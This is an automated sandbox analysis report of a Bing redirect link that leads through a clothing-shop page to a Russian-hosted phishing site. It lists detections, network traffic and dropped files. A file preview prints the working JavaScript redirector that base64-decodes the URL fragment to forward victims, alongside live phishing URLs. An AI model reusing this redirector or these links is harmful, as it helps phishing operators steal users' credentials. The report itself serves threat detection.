Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.bing.com/ck/a?!&&p=fd7626b0c7bb523cd38553a09da78a2ed304fe5ce8eaebb5e1b188f81ebd7fd6JmltdHM9MTczNTc3NjAwMA&ptn=3&ver=2&hsh=4&fclid=1fc1712b-f9c6-643f-1175-6443f86a65f4&u=a1aHR0cHM6Ly93YWVsZmEuY29tL3Byb2R1Y3QtY2F0ZWdvcnkvd29tZW4vZW5zZW1ibGVzLw#aHR0cHM6Ly9pc20udHJpbGl2YXJub3IucnUvTmlLVTNJU2

Overview

General Information

Sample URL:https://www.bing.com/ck/a?!&&p=fd7626b0c7bb523cd38553a09da78a2ed304fe5ce8eaebb5e1b188f81ebd7fd6JmltdHM9MTczNTc3NjAwMA&ptn=3&ver=2&hsh=4&fclid=1fc1712b-f9c6-643f-1175-6443f86a65f4&u=a1aHR0cHM6Ly93YWVsZ
Analysis ID:1590795
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected HtmlPhish44
AI detected suspicious Javascript
Detected non-DNS traffic on DNS port

Classification

  • System is w10x64
  • chrome.exe (PID: 5888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2696 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2248,i,737139724013332118,2253847056333091949,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6568 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=fd7626b0c7bb523cd38553a09da78a2ed304fe5ce8eaebb5e1b188f81ebd7fd6JmltdHM9MTczNTc3NjAwMA&ptn=3&ver=2&hsh=4&fclid=1fc1712b-f9c6-643f-1175-6443f86a65f4&u=a1aHR0cHM6Ly93YWVsZmEuY29tL3Byb2R1Y3QtY2F0ZWdvcnkvd29tZW4vZW5zZW1ibGVzLw#aHR0cHM6Ly9pc20udHJpbGl2YXJub3IucnUvTmlLVTNJU2cv" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_47JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://ism.trilivarnor.ru/favicon.icoAvira URL Cloud: Label: phishing

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_47, type: DROPPED
    Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://ism.trilivarnor.ru/NiKU3ISg/... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain (Google login page) after a delay. These behaviors are highly indicative of malicious intent, such as preventing analysis, obfuscating the script's purpose, and potentially attempting to steal user credentials.
    Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://ism.trilivarnor.ru/NiKU3ISg/... This script demonstrates multiple high-risk behaviors, including dynamic code execution via the Proxy object and eval, potential data exfiltration, and obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, warranting a maximum risk score of 10.
    Source: https://waelfa.com/product-category/women/ensembles/#aHR0cHM6Ly9pc20udHJpbGl2YXJub3IucnUvTmlLVTNJU2cvHTTP Parser: No favicon
    Source: https://ism.trilivarnor.ru/NiKU3ISg/HTTP Parser: No favicon
    Source: global trafficTCP traffic: 192.168.2.4:57280 -> 1.1.1.1:53
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /product-category/women/ensembles/ HTTP/1.1Host: waelfa.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /NiKU3ISg/ HTTP/1.1Host: ism.trilivarnor.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://waelfa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ism.trilivarnor.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ism.trilivarnor.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ism.trilivarnor.ru/NiKU3ISg/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ild1dmgwKzEzNUpuaGZhMFVxNHRjVEE9PSIsInZhbHVlIjoiRHp5ejZHZVk4SldFZmR2cWJBTnVwbmcxTzU5Y1h5SHA3c3NnUVg4MTdjbklZT3BaMmdjazhXSjZtVUpOU1gzSVpTZ0xvRWRSMzhnc3M3RStiYXFqcVhrY2VZY3dUelhVTTQ3UWVLRTlLQ3JzeHBRQUVmeU5OZzRxc1pTaHJoMFQiLCJtYWMiOiI3MTRiOTU1N2Y2MWRjNjU3MjJhMDIxMWE1ZjIzYzA1NTczMjc0NDgwM2JjMmY2NTU1NDBkMjRjYTFjNzAwODllIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImllZmtsV09zS2hVYjdMZGVQWGJPT3c9PSIsInZhbHVlIjoibXY1UWpkc2xvTFhTSGFxWmRLcEZOUi9NU0lUY3FCZWdmci9LZG14OUQrVnExSFpibjBKV1RONFhkV2Z1VGgwUWpVZHQ3TzIyRzhPZHJaNDYxYzhmL3FTUkQzU3FMNEtpc1FucXlGWTJSampncGlKQmxFaHFTaXFtU25BMlN0SUoiLCJtYWMiOiJhNjVkYzA4M2ZkNzFlZjlmYzgyYzM2NjcwNzliMDYwNjAxNjZkNzc4NjQwYzg3MjVhMzkyZjgxMTBkYTZiOGFlIiwidGFnIjoiIn0%3D
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: waelfa.com
    Source: global trafficDNS traffic detected: DNS query: ism.trilivarnor.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: unknownHTTP traffic detected: POST /report/v4?s=tCgVulBHinVdFQ6opTzzTGGtC9YK9hqb%2F4TKEmP7GowSkaIOwLJ4BCgXAoAuotz6Bn4ZJi9KDCgaE%2FuLqSLuzZ7zjK5AfccFIcGUWpHHMzUx%2B%2F90YmOhcB5jm09uzw%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 436Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 13:36:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tCgVulBHinVdFQ6opTzzTGGtC9YK9hqb%2F4TKEmP7GowSkaIOwLJ4BCgXAoAuotz6Bn4ZJi9KDCgaE%2FuLqSLuzZ7zjK5AfccFIcGUWpHHMzUx%2B%2F90YmOhcB5jm09uzw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4345&min_rtt=4323&rtt_var=1259&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2240&delivery_rate=635572&cwnd=251&unsent_bytes=0&cid=fe8723e28cb52974&ts=304&x=0"CF-Cache-Status: MISSServer: cloudflareCF-RAY: 901e045c2bc34338-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=2178&min_rtt=2170&rtt_var=830&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1902&delivery_rate=1305319&cwnd=193&unsent_bytes=0&cid=97e59a0714e3aa38&ts=2491&x=0"
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57349 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57349
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: classification engineClassification label: mal60.phis.win@18/8@10/11
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2248,i,737139724013332118,2253847056333091949,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=fd7626b0c7bb523cd38553a09da78a2ed304fe5ce8eaebb5e1b188f81ebd7fd6JmltdHM9MTczNTc3NjAwMA&ptn=3&ver=2&hsh=4&fclid=1fc1712b-f9c6-643f-1175-6443f86a65f4&u=a1aHR0cHM6Ly93YWVsZmEuY29tL3Byb2R1Y3QtY2F0ZWdvcnkvd29tZW4vZW5zZW1ibGVzLw#aHR0cHM6Ly9pc20udHJpbGl2YXJub3IucnUvTmlLVTNJU2cv"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2248,i,737139724013332118,2253847056333091949,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    Browser Extensions
    1
    Process Injection
    1
    Process Injection
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://www.bing.com/ck/a?!&&p=fd7626b0c7bb523cd38553a09da78a2ed304fe5ce8eaebb5e1b188f81ebd7fd6JmltdHM9MTczNTc3NjAwMA&ptn=3&ver=2&hsh=4&fclid=1fc1712b-f9c6-643f-1175-6443f86a65f4&u=a1aHR0cHM6Ly93YWVsZmEuY29tL3Byb2R1Y3QtY2F0ZWdvcnkvd29tZW4vZW5zZW1ibGVzLw#aHR0cHM6Ly9pc20udHJpbGl2YXJub3IucnUvTmlLVTNJU2cv0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://ism.trilivarnor.ru/favicon.ico100%Avira URL Cloudphishing
    https://waelfa.com/product-category/women/ensembles/0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      code.jquery.com
      151.101.2.137
      truefalse
        high
        www.google.com
        216.58.206.36
        truefalse
          high
          waelfa.com
          104.21.64.1
          truefalse
            unknown
            ism.trilivarnor.ru
            172.67.179.163
            truetrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              https://waelfa.com/product-category/women/ensembles/#aHR0cHM6Ly9pc20udHJpbGl2YXJub3IucnUvTmlLVTNJU2cvfalse
                unknown
                https://a.nel.cloudflare.com/report/v4?s=tCgVulBHinVdFQ6opTzzTGGtC9YK9hqb%2F4TKEmP7GowSkaIOwLJ4BCgXAoAuotz6Bn4ZJi9KDCgaE%2FuLqSLuzZ7zjK5AfccFIcGUWpHHMzUx%2B%2F90YmOhcB5jm09uzw%3D%3Dfalse
                  high
                  https://code.jquery.com/jquery-3.6.0.min.jsfalse
                    high
                    https://ism.trilivarnor.ru/favicon.icofalse
                    • Avira URL Cloud: phishing
                    unknown
                    https://waelfa.com/product-category/women/ensembles/false
                    • Avira URL Cloud: safe
                    unknown
                    https://ism.trilivarnor.ru/NiKU3ISg/true
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      104.21.64.1
                      waelfa.comUnited States
                      13335CLOUDFLARENETUSfalse
                      216.58.206.36
                      www.google.comUnited States
                      15169GOOGLEUSfalse
                      151.101.2.137
                      code.jquery.comUnited States
                      54113FASTLYUSfalse
                      239.255.255.250
                      unknownReserved
                      unknownunknownfalse
                      172.67.179.163
                      ism.trilivarnor.ruUnited States
                      13335CLOUDFLARENETUStrue
                      35.190.80.1
                      a.nel.cloudflare.comUnited States
                      15169GOOGLEUSfalse
                      IP
                      192.168.2.4
                      192.168.2.5
                      192.168.2.13
                      192.168.2.15
                      192.168.2.14
                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1590795
                      Start date and time:2025-01-14 14:35:40 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 4s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:browseurl.jbs
                      Sample URL:https://www.bing.com/ck/a?!&&p=fd7626b0c7bb523cd38553a09da78a2ed304fe5ce8eaebb5e1b188f81ebd7fd6JmltdHM9MTczNTc3NjAwMA&ptn=3&ver=2&hsh=4&fclid=1fc1712b-f9c6-643f-1175-6443f86a65f4&u=a1aHR0cHM6Ly93YWVsZmEuY29tL3Byb2R1Y3QtY2F0ZWdvcnkvd29tZW4vZW5zZW1ibGVzLw#aHR0cHM6Ly9pc20udHJpbGl2YXJub3IucnUvTmlLVTNJU2cv
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal60.phis.win@18/8@10/11
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 142.250.186.99, 108.177.15.84, 142.250.186.174, 142.250.184.206, 142.250.181.238, 2.23.227.215, 2.23.227.221, 2.23.227.208, 142.250.184.234, 142.250.186.170, 142.250.185.170, 142.250.185.234, 142.250.181.234, 142.250.185.106, 216.58.206.74, 142.250.185.202, 216.58.206.42, 172.217.16.202, 142.250.184.202, 172.217.23.106, 142.250.186.106, 142.250.185.74, 172.217.18.10, 142.250.186.138, 199.232.210.172, 2.17.190.73, 142.250.186.78, 142.250.80.46, 74.125.0.102, 216.58.212.174, 172.217.23.99, 2.23.242.162, 20.109.210.53, 13.107.246.45
                      • Not all processes where analyzed, report is missing behavior information
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: https://www.bing.com/ck/a?!&&p=fd7626b0c7bb523cd38553a09da78a2ed304fe5ce8eaebb5e1b188f81ebd7fd6JmltdHM9MTczNTc3NjAwMA&ptn=3&ver=2&hsh=4&fclid=1fc1712b-f9c6-643f-1175-6443f86a65f4&u=a1aHR0cHM6Ly93YWVsZmEuY29tL3Byb2R1Y3QtY2F0ZWdvcnkvd29tZW4vZW5zZW1ibGVzLw#aHR0cHM6Ly9pc20udHJpbGl2YXJub3IucnUvTmlLVTNJU2cv
                      No simulations
                      No context
                      No context
                      No context
                      No context
                      No context
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text
                      Category:downloaded
                      Size (bytes):1045
                      Entropy (8bit):4.935566191494263
                      Encrypted:false
                      SSDEEP:24:eKBMJZ55ou7mYVf5BxZjQDS2Yb6sIZWs04Nob:eKBAPnNHjQDS967osnNG
                      MD5:B3815812759AEF37E6AC5C136929E620
                      SHA1:F0752DDBF8899E1A363D585AEBC2496F5D5CCDD0
                      SHA-256:FB3E9739D9EBB8A801C1191595E10DE993B4BFDEB49463295B9F63B6C663B09B
                      SHA-512:7E98BA97827552D357F34851E9FF6BD7F10FAE2DE266F71328638562B6D622343E5E61C0D6D8449E056ABD389C5816599B6B83DFF6EDDC0F9B3C3A786D1CA44A
                      Malicious:false
                      Reputation:low
                      URL:https://waelfa.com/product-category/women/ensembles/
                      Preview:<scriptlanguage="javascript">.<html lang="en">.<head>.<meta charset="UTF-8">.<title>Redirect</title>.<script>.function base64DecodeUrl(str){. return decodeURIComponent(atob(str).split('').map(function(c) {. return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);. }).join(''));.}..window.onload = function() {. var hash = window.location.hash.substr(1); // Get the fragment after the '#'. var url;.. if (hash && hash.substr(0, 4) === 'http') {. url = hash; // If the fragment starts with 'http', use it as the URL. } else {. if (hash.includes('/')) {. url = base64DecodeUrl(hash.split('/')[0])+hash.split('/')[1]; // If not, try to base64 decode it. } else {. url = base64DecodeUrl(hash); // If not, try to base64 decode it. }. }.. if (url && /^(https?:\/\/)/.test(url)) { // Regex to check if the url starts with 'http://' or 'https://'. window.location.href = url; // If it's a valid URL, redirect. }.};.</scr
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (65447)
                      Category:downloaded
                      Size (bytes):77094
                      Entropy (8bit):5.291747840512514
                      Encrypted:false
                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4i:DIh8GgP3hujzwbhd3i
                      MD5:FFD3620C51C7FD7055AC9BE2551FB010
                      SHA1:FD2919A096551FAD059C5CBE5AADAA8C25B70414
                      SHA-256:DDB61AE9E2B6BF0118A26D8A08A2D73843F21916DDA5CC584AB3049C05687635
                      SHA-512:1A8105571097AAC6A6896835A8C5861EAB72301A712BCAEB97B99ECB413C24B649CD35F27BDDAFA44CE6C36C0A7BCFBFC9E9862218E27D7572E46F2BA9B7EC59
                      Malicious:false
                      Reputation:low
                      URL:https://code.jquery.com/jquery-3.6.0.min.js
                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text, with very long lines (65448), with CRLF line terminators
                      Category:downloaded
                      Size (bytes):446731
                      Entropy (8bit):2.8148941395508555
                      Encrypted:false
                      SSDEEP:768:CktYmG/kw94aq8FCtK7+hktYmG/kw94aq8FCtK7+nlrelrd:CIYR/kw94sIrIYR/kw94sINsD
                      MD5:11678C8F2866ACDCA040BD1E8F0A440B
                      SHA1:B622014265A7E70313E0E1DA6BDFCD1AA3291F96
                      SHA-256:3A5B3B49FC95C6E1463BB3D9F1D35F93780EE2C858BE544E92CFFC37F7AB985D
                      SHA-512:98B6344C4325926DD228D86A9C2D56A4D63AF34D88CCBB9B60A9132C6139C4815193BF0F39812F36BDAFFDEA4883273E3599F30913A2378111DA4CDFEBF5BD60
                      Malicious:false
                      Reputation:low
                      URL:https://ism.trilivarnor.ru/NiKU3ISg/
